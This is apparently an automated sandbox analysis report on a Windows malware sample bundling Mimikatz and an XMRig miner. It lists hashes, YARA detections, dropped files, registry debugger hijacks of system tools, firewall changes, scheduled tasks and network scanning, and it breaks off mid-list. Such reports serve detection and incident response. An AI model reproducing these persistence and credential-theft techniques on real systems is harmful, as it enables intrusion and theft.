Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240319-en -
resource tags
arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system -
submitted
12-04-2024 01:25
Behavioral task
behavioral1
Sample
2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
-
Size
17.3MB
-
MD5
e9aa571d6c2ddd4600b7e545b4de3253
-
SHA1
64061e225c9002334e1f2d60dd1e4f02f756c3a4
-
SHA256
9140efaf3b56d268ba6b39e77ff2723c3d1a0f2473007d975d42ef8cd504adf8
-
SHA512
3a7fa2a502ab5ec8063901968b98958b0e3a1affdceffa9c5c812a96e32c3de629cbf4dccaae997b8402b0f33259eb6f0eee5ddbcb8a3ed19b30c1de819b7138
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
suahuuu.exedescription pid process target process PID 2472 created 1884 2472 suahuuu.exe spoolsv.exe -
Contacts a large (23687) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 41 IoCs
Processes:
resource yara_rule behavioral2/memory/3752-0-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX C:\Windows\lbbdqheb\suahuuu.exe UPX behavioral2/memory/1796-7-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX behavioral2/memory/3692-136-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp UPX C:\Windows\tdtbtjeet\Corporate\vfshost.exe UPX behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp UPX C:\Windows\Temp\tdtbtjeet\gbvdtzbdv.exe UPX behavioral2/memory/960-141-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/960-144-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX C:\Windows\Temp\vleitjdvn\bgjnyg.exe UPX behavioral2/memory/3416-159-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/2552-171-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-174-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/432-176-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3576-180-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-183-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/960-189-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-192-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/2864-195-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/2116-199-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-202-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/2156-204-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/4260-208-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/2380-212-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-214-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/1064-217-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-219-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/3724-222-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/2136-226-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-240-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/6180-242-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/4400-244-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-245-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/6536-247-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/5944-249-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/5224-252-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/6796-254-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-255-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/6668-257-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp UPX behavioral2/memory/3416-259-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX behavioral2/memory/3416-261-0x00007FF619C00000-0x00007FF619D20000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/3416-174-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-183-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-192-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-202-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-214-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-219-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-240-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-245-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-255-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-259-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig behavioral2/memory/3416-261-0x00007FF619C00000-0x00007FF619D20000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3752-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz C:\Windows\lbbdqheb\suahuuu.exe mimikatz behavioral2/memory/1796-7-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
suahuuu.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts suahuuu.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts suahuuu.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 768 netsh.exe 2960 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
suahuuu.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe suahuuu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe suahuuu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" suahuuu.exe -
Executes dropped EXE 31 IoCs
Processes:
suahuuu.exesuahuuu.exewpcap.exetgjjdisve.exevfshost.exegbvdtzbdv.exexohudmc.exenspfoo.exebgjnyg.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exesuahuuu.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exemfhjlqvzt.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exesuahuuu.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exepid process 1796 suahuuu.exe 2472 suahuuu.exe 4092 wpcap.exe 2864 tgjjdisve.exe 3692 vfshost.exe 960 gbvdtzbdv.exe 3864 xohudmc.exe 2748 nspfoo.exe 3416 bgjnyg.exe 2552 gbvdtzbdv.exe 432 gbvdtzbdv.exe 3576 gbvdtzbdv.exe 960 gbvdtzbdv.exe 4856 suahuuu.exe 2864 gbvdtzbdv.exe 2116 gbvdtzbdv.exe 2156 gbvdtzbdv.exe 4260 gbvdtzbdv.exe 2380 gbvdtzbdv.exe 1064 gbvdtzbdv.exe 3724 gbvdtzbdv.exe 2136 gbvdtzbdv.exe 3080 mfhjlqvzt.exe 6180 gbvdtzbdv.exe 4400 gbvdtzbdv.exe 6536 gbvdtzbdv.exe 5944 gbvdtzbdv.exe 5936 suahuuu.exe 5224 gbvdtzbdv.exe 6796 gbvdtzbdv.exe 6668 gbvdtzbdv.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exetgjjdisve.exepid process 4092 wpcap.exe 4092 wpcap.exe 4092 wpcap.exe 4092 wpcap.exe 4092 wpcap.exe 4092 wpcap.exe 4092 wpcap.exe 4092 wpcap.exe 4092 wpcap.exe 2864 tgjjdisve.exe 2864 tgjjdisve.exe 2864 tgjjdisve.exe -
Processes:
resource yara_rule behavioral2/memory/3692-136-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp upx C:\Windows\tdtbtjeet\Corporate\vfshost.exe upx behavioral2/memory/3692-137-0x00007FF7060E0000-0x00007FF7061CE000-memory.dmp upx C:\Windows\Temp\tdtbtjeet\gbvdtzbdv.exe upx behavioral2/memory/960-141-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/960-144-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx C:\Windows\Temp\vleitjdvn\bgjnyg.exe upx behavioral2/memory/3416-159-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/2552-171-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-174-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/432-176-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3576-180-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-183-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/960-189-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-192-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/2864-195-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/2116-199-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-202-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/2156-204-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/4260-208-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/2380-212-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-214-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/1064-217-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-219-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/3724-222-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/2136-226-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-240-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/6180-242-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/4400-244-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-245-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/6536-247-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/5944-249-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/5224-252-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/6796-254-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-255-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/6668-257-0x00007FF7C96F0000-0x00007FF7C974B000-memory.dmp upx behavioral2/memory/3416-259-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx behavioral2/memory/3416-261-0x00007FF619C00000-0x00007FF619D20000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 93 ifconfig.me 95 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exexohudmc.exesuahuuu.exedescription ioc process File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\nspfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\nspfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 suahuuu.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 suahuuu.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A suahuuu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A suahuuu.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
suahuuu.exe2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exemfhjlqvzt.execmd.exedescription ioc process File created C:\Windows\tdtbtjeet\biqhmcbuq\Packet.dll suahuuu.exe File created C:\Windows\lbbdqheb\vimpcsvc.xml suahuuu.exe File opened for modification C:\Windows\lbbdqheb\spoolsrv.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\AppCapture32.dll suahuuu.exe File created C:\Windows\lbbdqheb\suahuuu.exe 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe File created C:\Windows\tdtbtjeet\UnattendGC\schoedcl.xml suahuuu.exe File created C:\Windows\tdtbtjeet\Corporate\vfshost.exe suahuuu.exe File created C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.dll suahuuu.exe File created C:\Windows\lbbdqheb\svschost.xml suahuuu.exe File opened for modification C:\Windows\lbbdqheb\svschost.xml suahuuu.exe File opened for modification C:\Windows\lbbdqheb\vimpcsvc.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\ssleay32.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\spoolsrv.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\spoolsrv.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\cnli-1.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\exma-1.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\trch-1.dll suahuuu.exe File opened for modification C:\Windows\lbbdqheb\schoedcl.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\zlib1.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\svschost.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\vimpcsvc.xml suahuuu.exe File opened for modification C:\Windows\tdtbtjeet\biqhmcbuq\Result.txt mfhjlqvzt.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\crli-0.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\spoolsrv.xml suahuuu.exe File created C:\Windows\lbbdqheb\spoolsrv.xml suahuuu.exe File opened for modification C:\Windows\lbbdqheb\docmicfg.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\vimpcsvc.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\schoedcl.exe suahuuu.exe File created C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\trfo-2.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\docmicfg.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\libxml2.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\ucl.dll suahuuu.exe File created C:\Windows\lbbdqheb\schoedcl.xml suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\docmicfg.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\AppCapture64.dll suahuuu.exe File created C:\Windows\tdtbtjeet\biqhmcbuq\mfhjlqvzt.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\coli-0.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\tibe-2.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\xdvl-0.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\docmicfg.xml suahuuu.exe File opened for modification C:\Windows\lbbdqheb\suahuuu.exe 2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\tucl-1.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\svschost.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\vimpcsvc.xml suahuuu.exe File created C:\Windows\tdtbtjeet\biqhmcbuq\ip.txt suahuuu.exe File created C:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\posh-0.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\schoedcl.xml suahuuu.exe File opened for modification C:\Windows\tdtbtjeet\Corporate\log.txt cmd.exe File created C:\Windows\tdtbtjeet\UnattendGC\Shellcode.ini suahuuu.exe File created C:\Windows\tdtbtjeet\Corporate\mimidrv.sys suahuuu.exe File created C:\Windows\tdtbtjeet\biqhmcbuq\scan.bat suahuuu.exe File created C:\Windows\tdtbtjeet\upbdrjv\swrpwe.exe suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\libeay32.dll suahuuu.exe File created C:\Windows\tdtbtjeet\UnattendGC\specials\svschost.xml suahuuu.exe File created C:\Windows\lbbdqheb\docmicfg.xml suahuuu.exe File created C:\Windows\tdtbtjeet\Corporate\mimilib.dll suahuuu.exe File opened for modification C:\Windows\tdtbtjeet\biqhmcbuq\Packet.dll suahuuu.exe File created C:\Windows\ime\suahuuu.exe suahuuu.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 1732 sc.exe 2016 sc.exe 1132 sc.exe 2408 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\lbbdqheb\suahuuu.exe nsis_installer_2 C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe nsis_installer_1 C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 5064 schtasks.exe 4688 schtasks.exe 2840 schtasks.exe -
Modifies data under HKEY_USERS 49 IoCs
Processes:
gbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exesuahuuu.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exegbvdtzbdv.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gbvdtzbdv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" suahuuu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gbvdtzbdv.exe 